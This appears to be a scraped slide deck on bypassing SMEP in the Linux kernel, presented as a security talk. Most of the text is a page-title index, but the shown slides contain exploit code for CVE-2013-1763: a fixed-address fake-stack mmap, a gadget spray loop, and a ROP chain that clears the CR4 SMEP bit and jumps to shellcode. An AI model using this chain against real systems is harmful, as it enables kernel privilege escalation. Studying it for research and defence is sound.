Practical SMEP bypass techniques on Linux

Recommendations

Info

CVE-2013-1763 SOCK_DIAG • Map the fakestack area in user-space: • 0x35000000 - 0x45000000 • fakestack = mmap((void*)0x35000000, 0x10000000, 7| PROT_EXEC|PROT_READ|PROT_WRITE, 0x32, 0, 0)) • Spray the fakestack with: • pop rax; ret for (int p = 0; p < 0x10000000/sizeof(void*); p++) *fakestack ++= 0xffffffff8100ad9eUL; // pop rax; ret
CVE-2013-1763 SOCK_DIAG ptr = (unsigned long *)(fakestack + 0x10000000 - 0x1000); *fakestack ++= 0xffffffff8133dc8fUL; // pop rdi; ret *fakestack ++= 0x407e0; // CLEAR <strong>SMEP</strong> BIT *fakestack ++= 0xffffffff810032edUL; // mov cr4, rdi; pop rbp; ret *fakestack ++= 0xdeadbeef; // dummy placeholder *fakestack ++= (unsigned long)kernel_code; // transfer control to our usual shellcode
Page 1 and 2: Practical
Page 3 and 4: Agenda • Introduction (ret2usr)
Page 5 and 6: et2usr High mem addr • Memory spl
Page 7 and 8: et2usr Privilege escalation • str
Page 9 and 10: et2usr Option #1 - corrupted functi
Page 11 and 12: et2usr Option #2 - corrupted data s
Page 13 and 14: SMEP
Page 15 and 16: SMEP OOPS
Page 17 and 18: SMEP • If CR4.<s
Page 19 and 20: AWS SMEP instance
Page 21 and 22: ROPing • vmlinux vs vmlinuz? •
Page 23 and 24: ROPing IA32 language density • Al
Page 25 and 26: Stack pivot - NX address Exploit at
Page 27 and 28: SMEP Bypass High m
Page 29 and 30: SMEP Bypass High m
Page 31 and 32: SMEP Bypass Option
Page 33 and 34: Fake stack • xchg %eax, %esp; ret
Page 35 and 36: Fake stack Spraying 0x10000 ROP INS
Page 37 and 38: Fake stack Spraying • May land in
Page 39 and 40: PART 2 - CVE-2013-1763
Page 41 and 42: CVE-2013-1763 SOCK_DIAG • Affecte
Page 43 and 44: CVE-2013-1763 SOCK_DIAG
Page 45 and 46: CVE-2013-1763 SOCK_DIAG High mem ad
Page 47: CVE-2013-1763 SOCK_DIAG High mem ad
Page 51: Questions? @vnik5287

Practical SMEP bypass techniques on Linux

You also want an ePaper? Increase the reach of your titles

Delete template?

Save as template?